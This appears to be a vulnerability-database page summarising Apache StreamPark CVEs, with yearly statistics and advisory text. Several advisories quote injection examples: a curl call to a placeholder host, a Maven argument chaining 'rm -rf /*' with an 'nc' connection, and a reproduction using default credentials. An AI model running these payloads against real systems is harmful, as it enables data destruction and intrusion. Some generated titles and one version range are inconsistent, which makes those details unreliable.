Apache Streampark

By the Year

In 2026 there have been 0 vulnerabilities in Apache Streampark. Last year, in 2025, Streampark had 5 security vulnerabilities published. Right now, Streampark is on track to have fewer security vulnerabilities in 2026 than it did last year.

Year    Vulnerabilities    Average Score
2026    0                  0.00
2025    5                  6.72
2024    7                  6.18
2023    5                  7.28

It may take a day or so for new Streampark vulnerabilities to show up in the stats or in the list of recent security vulnerabilities. Additionally, vulnerabilities may be tagged under a different product or component name.

Recent Apache Streampark Security Vulnerabilities

Apache StreamPark: Weak Fixed Encryption Keys (v2.0.0-2.1.6)
CVE-2025-53960 5.9 - Medium - December 12, 2025

When issuing JSON Web Tokens (JWT), Apache StreamPark directly uses the user's password as the HMAC signing key (e.g., with the HS256 algorithm). An attacker can exploit this vulnerability to perform offline brute-force attacks on the user's password using a captured JWT, or to arbitrarily forge identity tokens for the user if the password is already known, ultimately leading to complete account takeover. This issue affects Apache StreamPark: from 2.0.0 before 2.1.7. Users are recommended to upgrade to version 2.1.7, which fixes the issue.

Use of a Risky Cryptographic Primitive

Apache StreamPark Hard-Coded Encryption Key (2.0.0-2.1.6)
CVE-2025-54947 5.3 - Medium - December 12, 2025

In Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key exists. This vulnerability occurs because the system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access. This issue affects Apache StreamPark: from 2.0.0 before 2.1.7. Users are recommended to upgrade to version 2.1.7, which fixes the issue.

Use of Hard-coded Cryptographic Key

Apache StreamPark <2.1.7: Weak AES-ECB Encryption Exposes JWT
CVE-2025-54981 7.5 - High - December 12, 2025

Weak encryption algorithm in StreamPark: the use of an AES cipher in ECB mode and a weak random number generator for encrypting sensitive data, including JWT tokens, may have risked exposing sensitive authentication data. This issue affects Apache StreamPark: from 2.0.0 before 2.1.7. Users are recommended to upgrade to version 2.1.7, which fixes the issue.

Use of a Broken or Risky Cryptographic Algorithm

Apache StreamPark 2.1.4-2.1.5 ExecAssigned Permission Escalation
CVE-2025-30001 7.3 - High - October 10, 2025

Incorrect Execution-Assigned Permissions vulnerability in Apache StreamPark. This issue affects Apache StreamPark: from 2.1.4 before 2.1.6. Users are recommended to upgrade to version 2.1.6, which fixes the issue.

Incorrect Execution-Assigned Permissions

SQL Injection in Apache StreamPark 2.1.4-2.1.5 (Fixed in 2.1.6)
CVE-2024-48988 7.6 - High - August 22, 2025

SQL Injection vulnerability in Apache StreamPark. This issue affects Apache StreamPark: from 2.1.4 before 2.1.6. Users are recommended to upgrade to version 2.1.6, which fixes the issue. This vulnerability is present only in the distribution package (SpringBoot platform) and does not involve Maven artifacts. It can only be exploited after a user has successfully logged into the platform (implying that the attacker would first need to compromise the login authentication). As a result, the associated risk is considered relatively low.

SQL Injection: Hibernate

Session not invalidated after logout (backend service) pre-2.1.4
CVE-2024-29070 - July 23, 2024

On versions before 2.1.4, the session is not invalidated after logout. When the user logs in successfully, the Backend service returns "Authorization" as the front-end authentication credential. "Authorization" can still initiate requests and access data even after logout. Mitigation: all users should upgrade to 2.1.4.

Insufficient Session Expiration

Apache Flink <2.1.4: Auth Token Abuse Exposes All Users' Info (CVE-2024-34457)
CVE-2024-34457 6.5 - Medium - July 22, 2024

On versions before 2.1.4, after a regular user successfully logs in, they can manually make a request using the authorization token to view everyone's user flink information, including executeSQL and config. Mitigation: all users should upgrade to 2.1.4

Insecure Direct Object Reference / IDOR

Template Injection RCE (v<2.1.4) in Unknown Product
CVE-2024-29178 8.8 - High - July 18, 2024

On versions before 2.1.4, a user could log in and perform a template injection attack resulting in Remote Code Execution on the server. The attacker must successfully log into the system to launch an attack, so this is a moderate-impact vulnerability. Mitigation: all users should upgrade to 2.1.4.

Code Injection

Streampark <2.1.4 Auth Disclosure via Authorization Header
CVE-2024-29120 - July 17, 2024

In Streampark (version < 2.1.4), when a user logged in successfully, the Backend service would return "Authorization" as the front-end authentication credential. A user can use this credential to request other users' information, including the administrator's username, password, salt value, etc. Mitigation: all users should upgrade to 2.1.4.

StreamPark < Operator Command Injection (CVE-2023-52291) Pre-2.1.4
CVE-2023-52291 4.7 - Medium - July 17, 2024

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the "Project" module, the Maven build args "<" operator causes command injection, e.g. < (curl http://xxx.com ) will be executed as a command injection. Mitigation: all users should upgrade to 2.1.4. The "<" operator will be blocked.

Command Injection

Streampark RCE via Maven Build Argument (pre-2.1.4)
CVE-2024-29737 4.7 - Medium - July 17, 2024

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.4. Background info: Log in to Streampark using the default username (e.g. test1, test2, test3) and the default password (streampark). Navigate to the Project module, then add a new project. Enter the git repository address of the project and input `touch /tmp/success_2.1.2` as the "Build Argument". Note that there is no verification and interception of the special character "`". As a result, you will find that this injection command will be successfully executed after executing the build. In the latest version, the special symbol ` is intercepted.

Command Injection

SQLi via unsanitized sort field in streampark-console <2.1.4
CVE-2023-52290 - July 16, 2024

In streampark-console, on the list pages (e.g. application pages), users can sort the page by field. This sort field is sent from the front-end to the back-end, and the SQL query is generated using this field. However, because this sort field isn't validated, there is a risk of SQL injection vulnerability. The attacker must successfully log into the system to launch an attack, which may cause data leakage. Since no data will be written, this is a low-impact vulnerability. Mitigation: all users should upgrade to 2.1.4. Such parameters will be blocked.

SQL Injection

Streampark <2.1.2 Remote Command Execution via Unchecked Maven Parameters
CVE-2023-49898 7.2 - High - December 15, 2023

In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2. Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&": /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &

Command Injection

Streampark: SQL Injection via Name-Based Fuzzy Search before v2.1.2
CVE-2023-30867 4.9 - Medium - December 15, 2023

In the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The SQL syntax is: select * from table where jobName like '%jobName%'. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage. Mitigation: Users are recommended to upgrade to version 2.1.2, which fixes the issue.

SQL Injection

Apache StreamPark 1.0.0-1.x 'username not verified' vuln (CVE-2022-46365)
CVE-2022-46365 9.1 - Critical - May 01, 2023

Apache StreamPark 1.0.0 before 2.0.0: When the user successfully logs in, to modify his profile, the username will be passed to the server-layer as a parameter, but it is not verified whether the user name is the currently logged user and whether the user is legal. This will allow malicious attackers to send any username to modify and reset the account. Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later.

Apache StreamPark LDAP Injection flaw fixed in 2.0.0
CVE-2022-45801 5.4 - Medium - May 01, 2023

Apache StreamPark 1.0.0 to 2.0.0 have an LDAP injection vulnerability. LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements through techniques similar to SQL Injection. LDAP injection attacks could result in the granting of permissions to unauthorized queries, and content modification inside the LDAP tree. This risk may only occur when the user logs in with LDAP, and the user name and password login will not be affected. Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later.

Injection

StreamPark insecure Jar upload (CVE-2022-45802)
CVE-2022-45802 9.8 - Critical - May 01, 2023

Streampark allows any user to upload a jar as an application, but there is no mandatory verification of the uploaded file type, causing users to upload some high-risk files, and they may upload them to any directory. Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later.

Unrestricted File Upload
